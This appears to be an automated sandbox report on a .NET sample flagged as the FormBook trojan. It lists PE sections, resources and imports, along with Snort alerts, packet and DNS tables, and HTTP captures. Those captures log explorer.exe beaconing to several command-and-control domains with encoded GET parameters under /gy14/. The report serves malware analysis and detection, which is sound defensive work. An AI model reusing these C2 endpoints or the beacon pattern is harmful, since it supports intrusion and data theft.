add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x96c14	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x98000	0x2188	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x94c6c	0x94e00	c8638676cd8e6c10fe3d13a3fa8735f3	False	0.9400336508186398	data	7.959872783372705	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x98000	0x2188	0x2200	e03c5dac14f927352a1fe9d7cd160f92	False	0.8885569852941176	data	7.473660672390586	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9c000	0xc	0x200	698d55e4936bde7908ceb80de2c8f6b0	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x98100	0x1b01	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	1.0002893099956605
RT_GROUP_ICON	0x99c14	0x14	data	1.05
RT_VERSION	0x99c38	0x350	data	0.42806603773584906
RT_MANIFEST	0x99f98	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.491.195.240.1949742802031412 02/14/24-15:17:31.757335	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49742	80	192.168.2.4	91.195.240.19
192.168.2.4103.224.212.21249746802031412 02/14/24-15:20:15.792678	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49746	80	192.168.2.4	103.224.212.212
192.168.2.43.33.130.19049743802031412 02/14/24-15:18:54.070107	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49743	80	192.168.2.4	3.33.130.190
192.168.2.4154.86.173.21349740802031412 02/14/24-15:16:54.498158	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49740	80	192.168.2.4	154.86.173.213
192.168.2.4104.21.9.2249745802031412 02/14/24-15:19:55.217369	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49745	80	192.168.2.4	104.21.9.22
192.168.2.491.195.240.1949744802031412 02/14/24-15:19:14.453347	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49744	80	192.168.2.4	91.195.240.19

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2024 15:16:54.203763962 CET	49740	80	192.168.2.4	154.86.173.213
Feb 14, 2024 15:16:54.497935057 CET	80	49740	154.86.173.213	192.168.2.4
Feb 14, 2024 15:16:54.498034000 CET	49740	80	192.168.2.4	154.86.173.213
Feb 14, 2024 15:16:54.498157978 CET	49740	80	192.168.2.4	154.86.173.213
Feb 14, 2024 15:16:54.792572975 CET	80	49740	154.86.173.213	192.168.2.4
Feb 14, 2024 15:16:54.796998978 CET	80	49740	154.86.173.213	192.168.2.4
Feb 14, 2024 15:16:54.797024012 CET	80	49740	154.86.173.213	192.168.2.4
Feb 14, 2024 15:16:54.797166109 CET	49740	80	192.168.2.4	154.86.173.213
Feb 14, 2024 15:16:54.797211885 CET	49740	80	192.168.2.4	154.86.173.213
Feb 14, 2024 15:16:55.091435909 CET	80	49740	154.86.173.213	192.168.2.4
Feb 14, 2024 15:17:31.548044920 CET	49742	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:17:31.757011890 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:31.757247925 CET	49742	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:17:31.757334948 CET	49742	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:17:32.004637957 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.004714966 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.004754066 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.004791975 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.004791975 CET	49742	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:17:32.004832983 CET	49742	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:17:32.004832983 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.004870892 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.004909039 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.004911900 CET	49742	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:17:32.004946947 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.004987001 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.004987955 CET	49742	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:17:32.005187035 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.005225897 CET	49742	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:17:32.213531017 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.213557005 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.213568926 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.213581085 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.213596106 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.213608980 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.213623047 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.213634014 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.213646889 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:17:32.213867903 CET	49742	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:17:32.213867903 CET	49742	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:17:32.213867903 CET	49742	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:17:32.213867903 CET	49742	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:17:32.424662113 CET	80	49742	91.195.240.19	192.168.2.4
Feb 14, 2024 15:18:53.735662937 CET	49743	80	192.168.2.4	3.33.130.190
Feb 14, 2024 15:18:53.837212086 CET	80	49743	3.33.130.190	192.168.2.4
Feb 14, 2024 15:18:53.837378979 CET	49743	80	192.168.2.4	3.33.130.190
Feb 14, 2024 15:18:54.070106983 CET	49743	80	192.168.2.4	3.33.130.190
Feb 14, 2024 15:18:54.171576023 CET	80	49743	3.33.130.190	192.168.2.4
Feb 14, 2024 15:18:54.188632965 CET	80	49743	3.33.130.190	192.168.2.4
Feb 14, 2024 15:18:54.188649893 CET	80	49743	3.33.130.190	192.168.2.4
Feb 14, 2024 15:18:54.188810110 CET	49743	80	192.168.2.4	3.33.130.190
Feb 14, 2024 15:18:54.193205118 CET	80	49743	3.33.130.190	192.168.2.4
Feb 14, 2024 15:18:54.193288088 CET	49743	80	192.168.2.4	3.33.130.190
Feb 14, 2024 15:18:54.196971893 CET	49743	80	192.168.2.4	3.33.130.190
Feb 14, 2024 15:18:54.299052000 CET	80	49743	3.33.130.190	192.168.2.4
Feb 14, 2024 15:19:14.244443893 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:14.452943087 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.453128099 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:14.453346968 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:14.695976019 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.696010113 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.696027994 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.696043968 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.696065903 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.696072102 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:14.696083069 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.696101904 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.696104050 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:14.696120024 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.696121931 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:14.696139097 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.696156979 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.696161032 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:14.696199894 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:14.904742002 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.904771090 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.904788971 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.904807091 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.904824972 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.904843092 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.904860973 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.904864073 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:14.904880047 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.904901981 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:14.904907942 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:14.904933929 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:14.904992104 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:14.905343056 CET	49744	80	192.168.2.4	91.195.240.19
Feb 14, 2024 15:19:15.113620043 CET	80	49744	91.195.240.19	192.168.2.4
Feb 14, 2024 15:19:55.099917889 CET	49745	80	192.168.2.4	104.21.9.22
Feb 14, 2024 15:19:55.217143059 CET	80	49745	104.21.9.22	192.168.2.4
Feb 14, 2024 15:19:55.217282057 CET	49745	80	192.168.2.4	104.21.9.22
Feb 14, 2024 15:19:55.217369080 CET	49745	80	192.168.2.4	104.21.9.22
Feb 14, 2024 15:19:55.334763050 CET	80	49745	104.21.9.22	192.168.2.4
Feb 14, 2024 15:19:55.721035957 CET	49745	80	192.168.2.4	104.21.9.22
Feb 14, 2024 15:19:55.808767080 CET	80	49745	104.21.9.22	192.168.2.4
Feb 14, 2024 15:19:55.808826923 CET	80	49745	104.21.9.22	192.168.2.4
Feb 14, 2024 15:19:55.808878899 CET	49745	80	192.168.2.4	104.21.9.22
Feb 14, 2024 15:19:55.808878899 CET	49745	80	192.168.2.4	104.21.9.22
Feb 14, 2024 15:19:55.808964968 CET	80	49745	104.21.9.22	192.168.2.4
Feb 14, 2024 15:19:55.809119940 CET	49745	80	192.168.2.4	104.21.9.22
Feb 14, 2024 15:19:55.838323116 CET	80	49745	104.21.9.22	192.168.2.4
Feb 14, 2024 15:19:55.840516090 CET	49745	80	192.168.2.4	104.21.9.22
Feb 14, 2024 15:20:15.637267113 CET	49746	80	192.168.2.4	103.224.212.212
Feb 14, 2024 15:20:15.786935091 CET	80	49746	103.224.212.212	192.168.2.4
Feb 14, 2024 15:20:15.792589903 CET	49746	80	192.168.2.4	103.224.212.212
Feb 14, 2024 15:20:15.792678118 CET	49746	80	192.168.2.4	103.224.212.212
Feb 14, 2024 15:20:15.984565973 CET	80	49746	103.224.212.212	192.168.2.4
Feb 14, 2024 15:20:16.000722885 CET	80	49746	103.224.212.212	192.168.2.4
Feb 14, 2024 15:20:16.000768900 CET	80	49746	103.224.212.212	192.168.2.4
Feb 14, 2024 15:20:16.000832081 CET	49746	80	192.168.2.4	103.224.212.212
Feb 14, 2024 15:20:16.000869036 CET	49746	80	192.168.2.4	103.224.212.212
Feb 14, 2024 15:20:16.154567003 CET	80	49746	103.224.212.212	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2024 15:16:51.628679037 CET	50629	53	192.168.2.4	1.1.1.1
Feb 14, 2024 15:16:52.642364979 CET	50629	53	192.168.2.4	1.1.1.1
Feb 14, 2024 15:16:53.642369032 CET	50629	53	192.168.2.4	1.1.1.1
Feb 14, 2024 15:16:54.202574968 CET	53	50629	1.1.1.1	192.168.2.4
Feb 14, 2024 15:16:54.202595949 CET	53	50629	1.1.1.1	192.168.2.4
Feb 14, 2024 15:16:54.202613115 CET	53	50629	1.1.1.1	192.168.2.4
Feb 14, 2024 15:17:10.768065929 CET	63698	53	192.168.2.4	1.1.1.1
Feb 14, 2024 15:17:11.437947035 CET	53	63698	1.1.1.1	192.168.2.4
Feb 14, 2024 15:17:31.362816095 CET	51112	53	192.168.2.4	1.1.1.1
Feb 14, 2024 15:17:31.546817064 CET	53	51112	1.1.1.1	192.168.2.4
Feb 14, 2024 15:17:52.049396992 CET	57197	53	192.168.2.4	1.1.1.1
Feb 14, 2024 15:17:52.979367018 CET	53	57197	1.1.1.1	192.168.2.4
Feb 14, 2024 15:18:33.183829069 CET	57581	53	192.168.2.4	1.1.1.1
Feb 14, 2024 15:18:33.350033998 CET	53	57581	1.1.1.1	192.168.2.4
Feb 14, 2024 15:18:53.554550886 CET	55893	53	192.168.2.4	1.1.1.1
Feb 14, 2024 15:18:53.734786987 CET	53	55893	1.1.1.1	192.168.2.4
Feb 14, 2024 15:19:14.053788900 CET	54407	53	192.168.2.4	1.1.1.1
Feb 14, 2024 15:19:14.243532896 CET	53	54407	1.1.1.1	192.168.2.4
Feb 14, 2024 15:19:34.455919027 CET	56124	53	192.168.2.4	1.1.1.1
Feb 14, 2024 15:19:35.096283913 CET	53	56124	1.1.1.1	192.168.2.4
Feb 14, 2024 15:19:54.947292089 CET	62231	53	192.168.2.4	1.1.1.1
Feb 14, 2024 15:19:55.098855972 CET	53	62231	1.1.1.1	192.168.2.4
Feb 14, 2024 15:20:15.393091917 CET	60887	53	192.168.2.4	1.1.1.1
Feb 14, 2024 15:20:15.634274960 CET	53	60887	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 14, 2024 15:16:51.628679037 CET	192.168.2.4	1.1.1.1	0xcc98	Standard query (0)	www.smnyg.com	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:16:52.642364979 CET	192.168.2.4	1.1.1.1	0xcc98	Standard query (0)	www.smnyg.com	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:16:53.642369032 CET	192.168.2.4	1.1.1.1	0xcc98	Standard query (0)	www.smnyg.com	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:17:10.768065929 CET	192.168.2.4	1.1.1.1	0x83e2	Standard query (0)	www.mrbmed.com	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:17:31.362816095 CET	192.168.2.4	1.1.1.1	0x9271	Standard query (0)	www.naples.beauty	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:17:52.049396992 CET	192.168.2.4	1.1.1.1	0xcacb	Standard query (0)	www.8x101n.xyz	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:18:33.183829069 CET	192.168.2.4	1.1.1.1	0xb09b	Standard query (0)	www.whatsapp1.autos	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:18:53.554550886 CET	192.168.2.4	1.1.1.1	0x3ecc	Standard query (0)	www.venitro.com	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:19:14.053788900 CET	192.168.2.4	1.1.1.1	0xc696	Standard query (0)	www.tulisanemas.com	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:19:34.455919027 CET	192.168.2.4	1.1.1.1	0xf6b8	Standard query (0)	www.zezfhys.com	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:19:54.947292089 CET	192.168.2.4	1.1.1.1	0xf483	Standard query (0)	www.batuoe.com	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:20:15.393091917 CET	192.168.2.4	1.1.1.1	0x5052	Standard query (0)	www.theanhedonia.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 14, 2024 15:16:54.202574968 CET	1.1.1.1	192.168.2.4	0xcc98	No error (0)	www.smnyg.com		154.86.173.213	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:16:54.202595949 CET	1.1.1.1	192.168.2.4	0xcc98	No error (0)	www.smnyg.com		154.86.173.213	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:16:54.202613115 CET	1.1.1.1	192.168.2.4	0xcc98	No error (0)	www.smnyg.com		154.86.173.213	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:17:11.437947035 CET	1.1.1.1	192.168.2.4	0x83e2	Server failure (2)	www.mrbmed.com	none	none	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:17:31.546817064 CET	1.1.1.1	192.168.2.4	0x9271	No error (0)	www.naples.beauty	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 14, 2024 15:17:31.546817064 CET	1.1.1.1	192.168.2.4	0x9271	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:17:52.979367018 CET	1.1.1.1	192.168.2.4	0xcacb	Name error (3)	www.8x101n.xyz	none	none	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:18:33.350033998 CET	1.1.1.1	192.168.2.4	0xb09b	Name error (3)	www.whatsapp1.autos	none	none	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:18:53.734786987 CET	1.1.1.1	192.168.2.4	0x3ecc	No error (0)	www.venitro.com	venitro.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 14, 2024 15:18:53.734786987 CET	1.1.1.1	192.168.2.4	0x3ecc	No error (0)	venitro.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:18:53.734786987 CET	1.1.1.1	192.168.2.4	0x3ecc	No error (0)	venitro.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:19:14.243532896 CET	1.1.1.1	192.168.2.4	0xc696	No error (0)	www.tulisanemas.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 14, 2024 15:19:14.243532896 CET	1.1.1.1	192.168.2.4	0xc696	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:19:35.096283913 CET	1.1.1.1	192.168.2.4	0xf6b8	Name error (3)	www.zezfhys.com	none	none	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:19:55.098855972 CET	1.1.1.1	192.168.2.4	0xf483	No error (0)	www.batuoe.com		104.21.9.22	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:19:55.098855972 CET	1.1.1.1	192.168.2.4	0xf483	No error (0)	www.batuoe.com		172.67.141.17	A (IP address)	IN (0x0001)	false
Feb 14, 2024 15:20:15.634274960 CET	1.1.1.1	192.168.2.4	0x5052	No error (0)	www.theanhedonia.com		103.224.212.212	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.smnyg.com

www.naples.beauty

www.venitro.com

www.tulisanemas.com

www.batuoe.com

www.theanhedonia.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	154.86.173.213	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 15:16:54.498157978 CET	159	OUT	GET /gy14/?MRmX=e48KmGNPZ4HzO62J+BAEgJ7f72GC8C2SYwaKtCk56/rw6z0woMJSdTiOaB/ULaR4VT+G&J61h=CBZhCFnx- HTTP/1.1 Host: www.smnyg.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 14, 2024 15:16:54.796998978 CET	160	IN	HTTP/1.1 444 Server: nginx Date: Wed, 14 Feb 2024 14:16:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49742	91.195.240.19	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 15:17:31.757334948 CET	163	OUT	GET /gy14/?MRmX=Go8vTrGGndHO0U55xCKSgIW+IdqdbLSyuJQv9ABJU2ERxA5ov3fqO1PElBTDnF66GZzA&J61h=CBZhCFnx- HTTP/1.1 Host: www.naples.beauty Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 14, 2024 15:17:32.004637957 CET	1286	IN	HTTP/1.1 200 OK date: Wed, 14 Feb 2024 14:17:31 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_PStPL4frniSo99IFeH6FKNPshgtGv31ttdufbqQqgxjXcHN2kCmKzwwnIAccHdhUo+H0mk+h3meLhA7+PAhFqQ== last-modified: Wed, 14 Feb 2024 14:17:31 GMT x-cache-miss-from: parking-6db66cd898-gcxmr server: NginX connection: close Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 50 53 74 50 4c 34 66 72 6e 69 53 6f 39 39 49 46 65 48 36 46 4b 4e 50 73 68 67 74 47 76 33 31 74 74 64 75 66 62 71 51 71 67 78 6a 58 63 48 4e 32 6b 43 6d 4b 7a 77 77 6e 49 41 63 63 48 64 68 55 6f 2b 48 30 6d 6b 2b 68 33 6d 65 4c 68 41 37 2b 50 41 68 46 71 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6e 61 70 6c 65 73 2e 62 65 61 75 74 79 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6e 61 70 6c 65 73 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 61 70 6c 65 73 2e 62 65 61 75 74 79 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_PStPL4frniSo99IFeH6FKNPshgtGv31ttdufbqQqgxjXcHN2kCmKzwwnIAccHdhUo+H0mk+h3meLhA7+PAhFqQ==><head><meta charset="utf-8"><title>naples.beauty - naples Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="naples.beauty is your first and best source for all of the information youre looking for. From general t
Feb 14, 2024 15:17:32.004714966 CET	1286	IN	Data Raw: 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6e 61 70 6c 65 73 2e 62 65 61 75 74 79 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65 20 Data Ascii: opics to more of what you would expect to find here, naples.beauty has it all. We hope you find what you a576re searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo
